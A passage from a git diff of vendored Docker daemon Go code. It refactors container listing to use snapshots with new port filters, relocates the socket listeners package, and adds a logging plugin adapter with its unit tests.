nanosec resolution for sorting - sort.Sort(sort.Reverse(byContainerCreated(cntrs))) + sort.Sort(byCreatedDescending(cntrs)) - return cntrs + return cntrs, nil } // reduceContainers parses the user's filtering options and generates the list of containers to return based on a reducer. 
func (daemon *Daemon) reduceContainers(config *types.ContainerListOptions, reducer containerReducer) ([]*types.Container, error) { + if err := config.Filters.Validate(acceptedPsFilterTags); err != nil { + return nil, err + } + var ( + view = daemon.containersReplica.Snapshot() containers = []*types.Container{} ) - ctx, err := daemon.foldFilter(config) + ctx, err := daemon.foldFilter(view, config) if err != nil { return nil, err } // fastpath to only look at a subset of containers if specific name // or ID matches were provided by the user--otherwise we potentially - // end up locking and querying many more containers than intended - containerList := daemon.filterByNameIDMatches(ctx) + // end up querying many more containers than intended + containerList, err := daemon.filterByNameIDMatches(view, ctx) + if err != nil { + return nil, err + } - for _, container := range containerList { - t, err := daemon.reducePsContainer(container, ctx, reducer) + for i := range containerList { + t, err := daemon.reducePsContainer(&containerList[i], ctx, reducer) if err != nil { if err != errStopIteration { return nil, err @@ -198,13 +215,9 @@ func (daemon *Daemon) reduceContainers(config *types.ContainerListOptions, reduc } // reducePsContainer is the basic representation for a container as expected by the ps command. 
-func (daemon *Daemon) reducePsContainer(container *container.Container, ctx *listContext, reducer containerReducer) (*types.Container, error) { - container.Lock() - defer container.Unlock() - +func (daemon *Daemon) reducePsContainer(container *container.Snapshot, ctx *listContext, reducer containerReducer) (*types.Container, error) { // filter containers to return - action := includeContainerInList(container, ctx) - switch action { + switch includeContainerInList(container, ctx) { case excludeContainer: return nil, nil case stopIteration: @@ -212,17 +225,24 @@ func (daemon *Daemon) reducePsContainer(container *container.Container, ctx *lis } // transform internal container struct into api structs - return reducer(container, ctx) + newC, err := reducer(container, ctx) + if err != nil { + return nil, err + } + + // release lock because size calculation is slow + if ctx.Size { + sizeRw, sizeRootFs := daemon.imageService.GetContainerLayerSize(newC.ID) + newC.SizeRw = sizeRw + newC.SizeRootFs = sizeRootFs + } + return newC, nil } // foldFilter generates the container filter based on the user's filtering options. 
-func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listContext, error) { +func (daemon *Daemon) foldFilter(view container.View, config *types.ContainerListOptions) (*listContext, error) { psFilters := config.Filters - if err := psFilters.Validate(acceptedPsFilterTags); err != nil { - return nil, err - } - var filtExited []int err := psFilters.WalkValues("exited", func(value string) error { @@ -239,7 +259,7 @@ func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listConte err = psFilters.WalkValues("status", func(value string) error { if !container.IsValidStateString(value) { - return fmt.Errorf("Unrecognised filter value for status: %s", value) + return invalidFilter{"status", value} } config.All = true @@ -250,7 +270,7 @@ func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listConte } var taskFilter, isTask bool - if psFilters.Include("is-task") { + if psFilters.Contains("is-task") { if psFilters.ExactMatch("is-task", "true") { taskFilter = true isTask = true @@ -258,13 +278,13 @@ func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listConte taskFilter = true isTask = false } else { - return nil, fmt.Errorf("Invalid filter 'is-task=%s'", psFilters.Get("is-task")) + return nil, invalidFilter{"is-task", psFilters.Get("is-task")} } } err = psFilters.WalkValues("health", func(value string) error { if !container.IsValidHealthString(value) { - return fmt.Errorf("Unrecognised filter value for health: %s", value) + return errdefs.InvalidParameter(errors.Errorf("Unrecognised filter value for health: %s", value)) } return nil @@ -273,10 +293,10 @@ func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listConte return nil, err } - var beforeContFilter, sinceContFilter *container.Container + var beforeContFilter, sinceContFilter *container.Snapshot err = psFilters.WalkValues("before", func(value string) error { - beforeContFilter, err = daemon.GetContainer(value) + beforeContFilter, 
err = idOrNameFilter(view, value) return err }) if err != nil { @@ -284,7 +304,7 @@ func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listConte } err = psFilters.WalkValues("since", func(value string) error { - sinceContFilter, err = daemon.GetContainer(value) + sinceContFilter, err = idOrNameFilter(view, value) return err }) if err != nil { @@ -293,24 +313,36 @@ func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listConte imagesFilter := map[image.ID]bool{} var ancestorFilter bool - if psFilters.Include("ancestor") { + if psFilters.Contains("ancestor") { ancestorFilter = true psFilters.WalkValues("ancestor", func(ancestor string) error { - id, err := daemon.GetImageID(ancestor) + img, err := daemon.imageService.GetImage(ancestor) if err != nil { logrus.Warnf("Error while looking up for image %v", ancestor) return nil } - if imagesFilter[id] { + if imagesFilter[img.ID()] { // Already seen this ancestor, skip it return nil } // Then walk down the graph and put the imageIds in imagesFilter - populateImageFilterByParents(imagesFilter, id, daemon.imageStore.Children) + populateImageFilterByParents(imagesFilter, img.ID(), daemon.imageService.Children) return nil }) } + publishFilter := map[nat.Port]bool{} + err = psFilters.WalkValues("publish", portOp("publish", publishFilter)) + if err != nil { + return nil, err + } + + exposeFilter := map[nat.Port]bool{} + err = psFilters.WalkValues("expose", portOp("expose", exposeFilter)) + if err != nil { + return nil, err + } + return &listContext{ filters: psFilters, ancestorFilter: ancestorFilter, @@ -320,14 +352,61 @@ func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listConte sinceFilter: sinceContFilter, taskFilter: taskFilter, isTask: isTask, + publish: publishFilter, + expose: exposeFilter, ContainerListOptions: config, - names: daemon.nameIndex.GetAll(), + names: view.GetAllNames(), }, nil } +func idOrNameFilter(view container.View, value string) 
(*container.Snapshot, error) {
+	filter, err := view.Get(value)
+	switch err.(type) {
+	case container.NoSuchContainerError:
+		// Try name search instead
+		found := ""
+		for id, idNames := range view.GetAllNames() {
+			for _, eachName := range idNames {
+				if strings.TrimPrefix(value, "/") == strings.TrimPrefix(eachName, "/") {
+					if found != "" && found != id {
+						return nil, err
+					}
+					found = id
+				}
+			}
+		}
+		if found != "" {
+			filter, err = view.Get(found)
+		}
+	}
+	return filter, err
+}
+
+func portOp(key string, filter map[nat.Port]bool) func(value string) error {
+	return func(value string) error {
+		if strings.Contains(value, ":") {
+			return fmt.Errorf("filter for '%s' should not contain ':': %s", key, value)
+		}
+		//support two formats, original format <portnum>/[<proto>] or range format <startport-endport>/[<proto>]
+		proto, port := nat.SplitProtoPort(value)
+		start, end, err := nat.ParsePortRange(port)
+		if err != nil {
+			return fmt.Errorf("error while looking up for %s %s: %s", key, value, err)
+		}
+		for i := start; i <= end; i++ {
+			p, err := nat.NewPort(proto, strconv.FormatUint(i, 10))
+			if err != nil {
+				return fmt.Errorf("error while looking up for %s %s: %s", key, value, err)
+			}
+			filter[p] = true
+		}
+		return nil
+	}
+}
+
 // includeContainerInList decides whether a container should be included in the output or not based in the filter.
 // It also decides if the iteration should be stopped or not.
-func includeContainerInList(container *container.Container, ctx *listContext) iterationAction {
+func includeContainerInList(container *container.Snapshot, ctx *listContext) iterationAction {
 	// Do not include container if it's in the list before the filter container.
 	// Set the filter container to nil to include the rest of containers after this one.
if ctx.beforeFilter != nil { @@ -366,7 +445,7 @@ func includeContainerInList(container *container.Container, ctx *listContext) it } // Do not include container if any of the labels don't match - if !ctx.filters.MatchKVList("label", container.Config.Labels) { + if !ctx.filters.MatchKVList("label", container.Labels) { return excludeContainer } @@ -384,7 +463,7 @@ func includeContainerInList(container *container.Container, ctx *listContext) it if len(ctx.exitAllowed) > 0 { shouldSkip := true for _, code := range ctx.exitAllowed { - if code == container.ExitCode() && !container.Running && !container.StartedAt.IsZero() { + if code == container.ExitCode && !container.Running && !container.StartedAt.IsZero() { shouldSkip = false break } @@ -395,28 +474,34 @@ func includeContainerInList(container *container.Container, ctx *listContext) it } // Do not include container if its status doesn't match the filter - if !ctx.filters.Match("status", container.State.StateString()) { + if !ctx.filters.Match("status", container.State) { return excludeContainer } // Do not include container if its health doesn't match the filter - if !ctx.filters.ExactMatch("health", container.State.HealthString()) { + if !ctx.filters.ExactMatch("health", container.Health) { return excludeContainer } - if ctx.filters.Include("volume") { - volumesByName := make(map[string]*volume.MountPoint) - for _, m := range container.MountPoints { + if ctx.filters.Contains("volume") { + volumesByName := make(map[string]types.MountPoint) + for _, m := range container.Mounts { if m.Name != "" { volumesByName[m.Name] = m } else { volumesByName[m.Source] = m } } + volumesByDestination := make(map[string]types.MountPoint) + for _, m := range container.Mounts { + if m.Destination != "" { + volumesByDestination[m.Destination] = m + } + } volumeExist := fmt.Errorf("volume mounted in container") err := ctx.filters.WalkValues("volume", func(value string) error { - if _, exist := container.MountPoints[value]; exist { + if _, 
exist := volumesByDestination[value]; exist { return volumeExist } if _, exist := volumesByName[value]; exist { @@ -433,22 +518,28 @@ func includeContainerInList(container *container.Container, ctx *listContext) it if len(ctx.images) == 0 { return excludeContainer } - if !ctx.images[container.ImageID] { + if !ctx.images[image.ID(container.ImageID)] { return excludeContainer } } - networkExist := fmt.Errorf("container part of network") - if ctx.filters.Include("network") { + var ( + networkExist = errors.New("container part of network") + noNetworks = errors.New("container is not part of any networks") + ) + if ctx.filters.Contains("network") { err := ctx.filters.WalkValues("network", func(value string) error { + if container.NetworkSettings == nil { + return noNetworks + } if _, ok := container.NetworkSettings.Networks[value]; ok { return networkExist } for _, nw := range container.NetworkSettings.Networks { - if nw.EndpointSettings == nil { + if nw == nil { continue } - if nw.NetworkID == value { + if strings.HasPrefix(nw.NetworkID, value) { return networkExist } } @@ -459,195 +550,51 @@ func includeContainerInList(container *container.Container, ctx *listContext) it } } - return includeContainer -} - -// transformContainer generates the container type expected by the docker ps command. 
-func (daemon *Daemon) transformContainer(container *container.Container, ctx *listContext) (*types.Container, error) { - newC := &types.Container{ - ID: container.ID, - Names: ctx.names[container.ID], - ImageID: container.ImageID.String(), - } - if newC.Names == nil { - // Dead containers will often have no name, so make sure the response isn't null - newC.Names = []string{} - } - - image := container.Config.Image // if possible keep the original ref - if image != container.ImageID.String() { - id, err := daemon.GetImageID(image) - if _, isDNE := err.(ErrImageDoesNotExist); err != nil && !isDNE { - return nil, err - } - if err != nil || id != container.ImageID { - image = container.ImageID.String() - } - } - newC.Image = image - - if len(container.Args) > 0 { - args := []string{} - for _, arg := range container.Args { - if strings.Contains(arg, " ") { - args = append(args, fmt.Sprintf("'%s'", arg)) - } else { - args = append(args, arg) + if len(ctx.publish) > 0 { + shouldSkip := true + for port := range ctx.publish { + if _, ok := container.PortBindings[port]; ok { + shouldSkip = false + break } } - argsAsString := strings.Join(args, " ") - - newC.Command = fmt.Sprintf("%s %s", container.Path, argsAsString) - } else { - newC.Command = container.Path - } - newC.Created = container.Created.Unix() - newC.State = container.State.StateString() - newC.Status = container.State.String() - newC.HostConfig.NetworkMode = string(container.HostConfig.NetworkMode) - // copy networks to avoid races - networks := make(map[string]*networktypes.EndpointSettings) - for name, network := range container.NetworkSettings.Networks { - if network == nil || network.EndpointSettings == nil { - continue - } - networks[name] = &networktypes.EndpointSettings{ - EndpointID: network.EndpointID, - Gateway: network.Gateway, - IPAddress: network.IPAddress, - IPPrefixLen: network.IPPrefixLen, - IPv6Gateway: network.IPv6Gateway, - GlobalIPv6Address: network.GlobalIPv6Address, - GlobalIPv6PrefixLen: 
network.GlobalIPv6PrefixLen, - MacAddress: network.MacAddress, - NetworkID: network.NetworkID, - } - if network.IPAMConfig != nil { - networks[name].IPAMConfig = &networktypes.EndpointIPAMConfig{ - IPv4Address: network.IPAMConfig.IPv4Address, - IPv6Address: network.IPAMConfig.IPv6Address, - } + if shouldSkip { + return excludeContainer } } - newC.NetworkSettings = &types.SummaryNetworkSettings{Networks: networks} - newC.Ports = []types.Port{} - for port, bindings := range container.NetworkSettings.Ports { - p, err := nat.ParsePort(port.Port()) - if err != nil { - return nil, err - } - if len(bindings) == 0 { - newC.Ports = append(newC.Ports, types.Port{ - PrivatePort: uint16(p), - Type: port.Proto(), - }) - continue - } - for _, binding := range bindings { - h, err := nat.ParsePort(binding.HostPort) - if err != nil { - return nil, err + if len(ctx.expose) > 0 { + shouldSkip := true + for port := range ctx.expose { + if _, ok := container.ExposedPorts[port]; ok { + shouldSkip = false + break } - newC.Ports = append(newC.Ports, types.Port{ - PrivatePort: uint16(p), - PublicPort: uint16(h), - Type: port.Proto(), - IP: binding.HostIP, - }) } - } - - if ctx.Size { - sizeRw, sizeRootFs := daemon.getSize(container) - newC.SizeRw = sizeRw - newC.SizeRootFs = sizeRootFs - } - newC.Labels = container.Config.Labels - newC.Mounts = addMountPoints(container) - - return newC, nil -} - -// Volumes lists known volumes, using the filter to restrict the range -// of volumes returned. 
-func (daemon *Daemon) Volumes(filter string) ([]*types.Volume, []string, error) { - var ( - volumesOut []*types.Volume - ) - volFilters, err := filters.FromParam(filter) - if err != nil { - return nil, nil, err - } - - if err := volFilters.Validate(acceptedVolumeFilterTags); err != nil { - return nil, nil, err - } - - volumes, warnings, err := daemon.volumes.List() - if err != nil { - return nil, nil, err - } - - filterVolumes, err := daemon.filterVolumes(volumes, volFilters) - if err != nil { - return nil, nil, err - } - for _, v := range filterVolumes { - apiV := volumeToAPIType(v) - if vv, ok := v.(interface { - CachedPath() string - }); ok { - apiV.Mountpoint = vv.CachedPath() - } else { - apiV.Mountpoint = v.Path() + if shouldSkip { + return excludeContainer } - volumesOut = append(volumesOut, apiV) } - return volumesOut, warnings, nil -} -// filterVolumes filters volume list according to user specified filter -// and returns user chosen volumes -func (daemon *Daemon) filterVolumes(vols []volume.Volume, filter filters.Args) ([]volume.Volume, error) { - // if filter is empty, return original volume list - if filter.Len() == 0 { - return vols, nil - } + return includeContainer +} - var retVols []volume.Volume - for _, vol := range vols { - if filter.Include("name") { - if !filter.Match("name", vol.Name()) { - continue - } - } - if filter.Include("driver") { - if !filter.Match("driver", vol.DriverName()) { - continue - } - } - if filter.Include("label") { - v, ok := vol.(volume.DetailedVolume) - if !ok { - continue - } - if !filter.MatchKVList("label", v.Labels()) { - continue - } +// refreshImage checks if the Image ref still points to the correct ID, and updates the ref to the actual ID when it doesn't +func (daemon *Daemon) refreshImage(s *container.Snapshot, ctx *listContext) (*types.Container, error) { + c := s.Container + image := s.Image // keep the original ref if still valid (hasn't changed) + if image != s.ImageID { + img, err := 
daemon.imageService.GetImage(image) + if _, isDNE := err.(images.ErrImageDoesNotExist); err != nil && !isDNE { + return nil, err } - retVols = append(retVols, vol) - } - danglingOnly := false - if filter.Include("dangling") { - if filter.ExactMatch("dangling", "true") || filter.ExactMatch("dangling", "1") { - danglingOnly = true - } else if !filter.ExactMatch("dangling", "false") && !filter.ExactMatch("dangling", "0") { - return nil, fmt.Errorf("Invalid filter 'dangling=%s'", filter.Get("dangling")) + if err != nil || img.ImageID() != s.ImageID { + // ref changed, we need to use original ID + image = s.ImageID } - retVols = daemon.volumes.FilterByUsed(retVols, !danglingOnly) } - return retVols, nil + c.Image = image + return &c, nil } func populateImageFilterByParents(ancestorMap map[image.ID]bool, imageID image.ID, getChildren func(image.ID) []image.ID) { diff --git a/vendor/github.com/docker/docker/daemon/list_test.go b/vendor/github.com/docker/docker/daemon/list_test.go new file mode 100644 index 0000000000..3be510d13d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/list_test.go @@ -0,0 +1,26 @@ +package daemon + +import ( + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/container" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestListInvalidFilter(t *testing.T) { + db, err := container.NewViewDB() + assert.Assert(t, err == nil) + d := &Daemon{ + containersReplica: db, + } + + f := filters.NewArgs(filters.Arg("invalid", "foo")) + + _, err = d.Containers(&types.ContainerListOptions{ + Filters: f, + }) + assert.Assert(t, is.Error(err, "Invalid filter 'invalid'")) +} diff --git a/vendor/github.com/docker/docker/daemon/list_unix.go b/vendor/github.com/docker/docker/daemon/list_unix.go index 91c9caccf4..4f9e453bc2 100644 --- a/vendor/github.com/docker/docker/daemon/list_unix.go +++ b/vendor/github.com/docker/docker/daemon/list_unix.go @@ -1,11 +1,11 @@ -// 
+build linux freebsd solaris +// +build linux freebsd -package daemon +package daemon // import "github.com/docker/docker/daemon" import "github.com/docker/docker/container" // excludeByIsolation is a platform specific helper function to support PS // filtering by Isolation. This is a Windows-only concept, so is a no-op on Unix. -func excludeByIsolation(container *container.Container, ctx *listContext) iterationAction { +func excludeByIsolation(container *container.Snapshot, ctx *listContext) iterationAction { return includeContainer } diff --git a/vendor/github.com/docker/docker/daemon/list_windows.go b/vendor/github.com/docker/docker/daemon/list_windows.go index 7fbcd3af26..7c7b5fa856 100644 --- a/vendor/github.com/docker/docker/daemon/list_windows.go +++ b/vendor/github.com/docker/docker/daemon/list_windows.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "strings" @@ -8,7 +8,7 @@ import ( // excludeByIsolation is a platform specific helper function to support PS // filtering by Isolation. This is a Windows-only concept, so is a no-op on Unix. 
-func excludeByIsolation(container *container.Container, ctx *listContext) iterationAction { +func excludeByIsolation(container *container.Snapshot, ctx *listContext) iterationAction { i := strings.ToLower(string(container.HostConfig.Isolation)) if i == "" { i = "default" diff --git a/vendor/github.com/docker/docker/daemon/listeners/group_unix.go b/vendor/github.com/docker/docker/daemon/listeners/group_unix.go new file mode 100644 index 0000000000..9cc17eba7b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/listeners/group_unix.go @@ -0,0 +1,34 @@ +// +build !windows + +package listeners // import "github.com/docker/docker/daemon/listeners" + +import ( + "fmt" + "strconv" + + "github.com/opencontainers/runc/libcontainer/user" + "github.com/pkg/errors" +) + +const defaultSocketGroup = "docker" + +func lookupGID(name string) (int, error) { + groupFile, err := user.GetGroupPath() + if err != nil { + return -1, errors.Wrap(err, "error looking up groups") + } + groups, err := user.ParseGroupFileFilter(groupFile, func(g user.Group) bool { + return g.Name == name || strconv.Itoa(g.Gid) == name + }) + if err != nil { + return -1, errors.Wrapf(err, "error parsing groups for %s", name) + } + if len(groups) > 0 { + return groups[0].Gid, nil + } + gid, err := strconv.Atoi(name) + if err == nil { + return gid, nil + } + return -1, fmt.Errorf("group %s not found", name) +} diff --git a/vendor/github.com/docker/docker/pkg/listeners/listeners_unix.go b/vendor/github.com/docker/docker/daemon/listeners/listeners_linux.go similarity index 75% rename from vendor/github.com/docker/docker/pkg/listeners/listeners_unix.go rename to vendor/github.com/docker/docker/daemon/listeners/listeners_linux.go index 1bcae7aa3e..c8956db258 100644 --- a/vendor/github.com/docker/docker/pkg/listeners/listeners_unix.go +++ b/vendor/github.com/docker/docker/daemon/listeners/listeners_linux.go @@ -1,16 +1,15 @@ -// +build !windows,!solaris - -package listeners +package listeners // import 
"github.com/docker/docker/daemon/listeners" import ( "crypto/tls" "fmt" "net" + "os" "strconv" - "github.com/Sirupsen/logrus" "github.com/coreos/go-systemd/activation" "github.com/docker/go-connections/sockets" + "github.com/sirupsen/logrus" ) // Init creates new listeners for the server. @@ -32,7 +31,17 @@ func Init(proto, addr, socketGroup string, tlsConfig *tls.Config) ([]net.Listene } ls = append(ls, l) case "unix": - l, err := sockets.NewUnixSocket(addr, socketGroup) + gid, err := lookupGID(socketGroup) + if err != nil { + if socketGroup != "" { + if socketGroup != defaultSocketGroup { + return nil, err + } + logrus.Warnf("could not change group %s to %s: %v", addr, defaultSocketGroup, err) + } + gid = os.Getgid() + } + l, err := sockets.NewUnixSocket(addr, gid) if err != nil { return nil, fmt.Errorf("can't create unix socket %s: %v", addr, err) } @@ -53,9 +62,9 @@ func listenFD(addr string, tlsConfig *tls.Config) ([]net.Listener, error) { ) // socket activation if tlsConfig != nil { - listeners, err = activation.TLSListeners(false, tlsConfig) + listeners, err = activation.TLSListeners(tlsConfig) } else { - listeners, err = activation.Listeners(false) + listeners, err = activation.Listeners() } if err != nil { return nil, err @@ -75,7 +84,7 @@ func listenFD(addr string, tlsConfig *tls.Config) ([]net.Listener, error) { return nil, fmt.Errorf("failed to parse systemd fd address: should be a number: %v", addr) } fdOffset := fdNum - 3 - if len(listeners) < int(fdOffset)+1 { + if len(listeners) < fdOffset+1 { return nil, fmt.Errorf("too few socket activated files passed in by systemd") } if listeners[fdOffset] == nil { @@ -86,8 +95,7 @@ func listenFD(addr string, tlsConfig *tls.Config) ([]net.Listener, error) { continue } if err := ls.Close(); err != nil { - // TODO: We shouldn't log inside a library. Remove this or error out. 
- logrus.Errorf("failed to close systemd activated file: fd %d: %v", fdOffset+3, err) + return nil, fmt.Errorf("failed to close systemd activated file: fd %d: %v", fdOffset+3, err) } } return []net.Listener{listeners[fdOffset]}, nil diff --git a/vendor/github.com/docker/docker/pkg/listeners/listeners_windows.go b/vendor/github.com/docker/docker/daemon/listeners/listeners_windows.go similarity index 94% rename from vendor/github.com/docker/docker/pkg/listeners/listeners_windows.go rename to vendor/github.com/docker/docker/daemon/listeners/listeners_windows.go index 5b5a470fc6..73f5f79e4b 100644 --- a/vendor/github.com/docker/docker/pkg/listeners/listeners_windows.go +++ b/vendor/github.com/docker/docker/daemon/listeners/listeners_windows.go @@ -1,4 +1,4 @@ -package listeners +package listeners // import "github.com/docker/docker/daemon/listeners" import ( "crypto/tls" diff --git a/vendor/github.com/docker/docker/daemon/logdrivers_linux.go b/vendor/github.com/docker/docker/daemon/logdrivers_linux.go index ad343c1e8e..6ddcd2fc8d 100644 --- a/vendor/github.com/docker/docker/daemon/logdrivers_linux.go +++ b/vendor/github.com/docker/docker/daemon/logdrivers_linux.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( // Importing packages here only to make sure their init gets called and diff --git a/vendor/github.com/docker/docker/daemon/logdrivers_windows.go b/vendor/github.com/docker/docker/daemon/logdrivers_windows.go index f3002b97e2..62e7a6f95b 100644 --- a/vendor/github.com/docker/docker/daemon/logdrivers_windows.go +++ b/vendor/github.com/docker/docker/daemon/logdrivers_windows.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( // Importing packages here only to make sure their init gets called and @@ -6,6 +6,7 @@ import ( _ "github.com/docker/docker/daemon/logger/awslogs" _ "github.com/docker/docker/daemon/logger/etwlogs" _ 
"github.com/docker/docker/daemon/logger/fluentd" + _ "github.com/docker/docker/daemon/logger/gelf" _ "github.com/docker/docker/daemon/logger/jsonfilelog" _ "github.com/docker/docker/daemon/logger/logentries" _ "github.com/docker/docker/daemon/logger/splunk" diff --git a/vendor/github.com/docker/docker/daemon/logger/adapter.go b/vendor/github.com/docker/docker/daemon/logger/adapter.go new file mode 100644 index 0000000000..95aff9bf3b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/adapter.go @@ -0,0 +1,139 @@ +package logger // import "github.com/docker/docker/daemon/logger" + +import ( + "io" + "os" + "path/filepath" + "sync" + "time" + + "github.com/docker/docker/api/types/plugins/logdriver" + "github.com/docker/docker/pkg/plugingetter" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +// pluginAdapter takes a plugin and implements the Logger interface for logger +// instances +type pluginAdapter struct { + driverName string + id string + plugin logPlugin + fifoPath string + capabilities Capability + logInfo Info + + // synchronize access to the log stream and shared buffer + mu sync.Mutex + enc logdriver.LogEntryEncoder + stream io.WriteCloser + // buf is shared for each `Log()` call to reduce allocations. 
+ // buf must be protected by mutex + buf logdriver.LogEntry +} + +func (a *pluginAdapter) Log(msg *Message) error { + a.mu.Lock() + + a.buf.Line = msg.Line + a.buf.TimeNano = msg.Timestamp.UnixNano() + a.buf.Partial = msg.PLogMetaData != nil + a.buf.Source = msg.Source + + err := a.enc.Encode(&a.buf) + a.buf.Reset() + + a.mu.Unlock() + + PutMessage(msg) + return err +} + +func (a *pluginAdapter) Name() string { + return a.driverName +} + +func (a *pluginAdapter) Close() error { + a.mu.Lock() + defer a.mu.Unlock() + + if err := a.plugin.StopLogging(filepath.Join("/", "run", "docker", "logging", a.id)); err != nil { + return err + } + + if err := a.stream.Close(); err != nil { + logrus.WithError(err).Error("error closing plugin fifo") + } + if err := os.Remove(a.fifoPath); err != nil && !os.IsNotExist(err) { + logrus.WithError(err).Error("error cleaning up plugin fifo") + } + + // may be nil, especially for unit tests + if pluginGetter != nil { + pluginGetter.Get(a.Name(), extName, plugingetter.Release) + } + return nil +} + +type pluginAdapterWithRead struct { + *pluginAdapter +} + +func (a *pluginAdapterWithRead) ReadLogs(config ReadConfig) *LogWatcher { + watcher := NewLogWatcher() + + go func() { + defer close(watcher.Msg) + stream, err := a.plugin.ReadLogs(a.logInfo, config) + if err != nil { + watcher.Err <- errors.Wrap(err, "error getting log reader") + return + } + defer stream.Close() + + dec := logdriver.NewLogEntryDecoder(stream) + for { + select { + case <-watcher.WatchClose(): + return + default: + } + + var buf logdriver.LogEntry + if err := dec.Decode(&buf); err != nil { + if err == io.EOF { + return + } + select { + case watcher.Err <- errors.Wrap(err, "error decoding log message"): + case <-watcher.WatchClose(): + } + return + } + + msg := &Message{ + Timestamp: time.Unix(0, buf.TimeNano), + Line: buf.Line, + Source: buf.Source, + } + + // plugin should handle this, but check just in case + if !config.Since.IsZero() && 
msg.Timestamp.Before(config.Since) { + continue + } + if !config.Until.IsZero() && msg.Timestamp.After(config.Until) { + return + } + + select { + case watcher.Msg <- msg: + case <-watcher.WatchClose(): + // make sure the message we consumed is sent + watcher.Msg <- msg + return + } + } + }() + + return watcher +} diff --git a/vendor/github.com/docker/docker/daemon/logger/adapter_test.go b/vendor/github.com/docker/docker/daemon/logger/adapter_test.go new file mode 100644 index 0000000000..f47e711c89 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/adapter_test.go @@ -0,0 +1,216 @@ +package logger // import "github.com/docker/docker/daemon/logger" + +import ( + "encoding/binary" + "io" + "sync" + "testing" + "time" + + "github.com/docker/docker/api/types/plugins/logdriver" + protoio "github.com/gogo/protobuf/io" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +// mockLoggingPlugin implements the loggingPlugin interface for testing purposes +// it only supports a single log stream +type mockLoggingPlugin struct { + io.WriteCloser + inStream io.Reader + logs []*logdriver.LogEntry + c *sync.Cond + err error +} + +func newMockLoggingPlugin() *mockLoggingPlugin { + r, w := io.Pipe() + return &mockLoggingPlugin{ + WriteCloser: w, + inStream: r, + logs: []*logdriver.LogEntry{}, + c: sync.NewCond(new(sync.Mutex)), + } +} + +func (l *mockLoggingPlugin) StartLogging(file string, info Info) error { + go func() { + dec := protoio.NewUint32DelimitedReader(l.inStream, binary.BigEndian, 1e6) + for { + var msg logdriver.LogEntry + if err := dec.ReadMsg(&msg); err != nil { + l.c.L.Lock() + if l.err == nil { + l.err = err + } + l.c.L.Unlock() + + l.c.Broadcast() + return + + } + + l.c.L.Lock() + l.logs = append(l.logs, &msg) + l.c.L.Unlock() + l.c.Broadcast() + } + + }() + return nil +} + +func (l *mockLoggingPlugin) StopLogging(file string) error { + l.c.L.Lock() + if l.err == nil { + l.err = io.EOF + } + l.c.L.Unlock() + l.c.Broadcast() + return nil +} 
+ +func (l *mockLoggingPlugin) Capabilities() (cap Capability, err error) { + return Capability{ReadLogs: true}, nil +} + +func (l *mockLoggingPlugin) ReadLogs(info Info, config ReadConfig) (io.ReadCloser, error) { + r, w := io.Pipe() + + go func() { + var idx int + enc := logdriver.NewLogEntryEncoder(w) + + l.c.L.Lock() + defer l.c.L.Unlock() + for { + if l.err != nil { + w.Close() + return + } + + if idx >= len(l.logs) { + if !config.Follow { + w.Close() + return + } + + l.c.Wait() + continue + } + + if err := enc.Encode(l.logs[idx]); err != nil { + w.CloseWithError(err) + return + } + idx++ + } + }() + + return r, nil +} + +func (l *mockLoggingPlugin) waitLen(i int) { + l.c.L.Lock() + defer l.c.L.Unlock() + for len(l.logs) < i { + l.c.Wait() + } +} + +func (l *mockLoggingPlugin) check(t *testing.T) { + if l.err != nil && l.err != io.EOF { + t.Fatal(l.err) + } +} + +func newMockPluginAdapter(plugin *mockLoggingPlugin) Logger { + enc := logdriver.NewLogEntryEncoder(plugin) + a := &pluginAdapterWithRead{ + &pluginAdapter{ + plugin: plugin, + stream: plugin, + enc: enc, + }, + } + a.plugin.StartLogging("", Info{}) + return a +} + +func TestAdapterReadLogs(t *testing.T) { + plugin := newMockLoggingPlugin() + l := newMockPluginAdapter(plugin) + + testMsg := []Message{ + {Line: []byte("Are you the keymaker?"), Timestamp: time.Now()}, + {Line: []byte("Follow the white rabbit"), Timestamp: time.Now()}, + } + for _, msg := range testMsg { + m := msg.copy() + assert.Check(t, l.Log(m)) + } + + // Wait until messages are read into plugin + plugin.waitLen(len(testMsg)) + + lr, ok := l.(LogReader) + assert.Check(t, ok, "Logger does not implement LogReader") + + lw := lr.ReadLogs(ReadConfig{}) + + for _, x := range testMsg { + select { + case msg := <-lw.Msg: + testMessageEqual(t, &x, msg) + case <-time.After(10 * time.Second): + t.Fatal("timeout reading logs") + } + } + + select { + case _, ok := <-lw.Msg: + assert.Check(t, !ok, "expected message channel to be closed") + case 
